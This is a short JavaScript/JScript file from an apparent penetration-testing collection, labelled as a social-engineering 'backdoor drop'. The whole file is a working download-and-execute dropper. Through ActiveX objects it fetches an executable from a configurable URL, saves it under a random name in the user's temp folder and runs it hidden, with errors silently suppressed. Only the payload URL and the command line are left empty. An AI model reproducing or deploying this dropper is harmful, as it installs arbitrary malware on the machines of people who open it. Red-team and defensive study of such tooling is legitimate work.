mgeeky-Penetration-Testing-.../social-engineering/backdoor-drop.js
2018-02-02 22:22:43 +01:00

26 lines
645 B
JavaScript

<script>
var SRC = "";
var CMDLINE = "";
var out = Math.random().toString(36).substring(7) + ".exe";
var axo = this.ActiveXObject;
var wshell = new axo("WScript.Shell");
var path = wshell.ExpandEnvironmentStrings("%TEMP%") + "/" + out;
var xhr = new axo("MSXML2.XMLHTTP");
xhr.onreadystatechange = function () {
if (xhr.readystate === 4) {
var adodb = new axo("ADODB.Stream");
adodb.open();
adodb.type = 1;
adodb.write(xhr.ResponseBody);
adodb.position = 0;
adodb.saveToFile(path, 2);
adodb.close();
};
};
try {
xhr.open("GET", SRC, false);
xhr.send();
wshell.Run(path + " " + CMDLINE, 0, false);
} catch (err) { };
</script>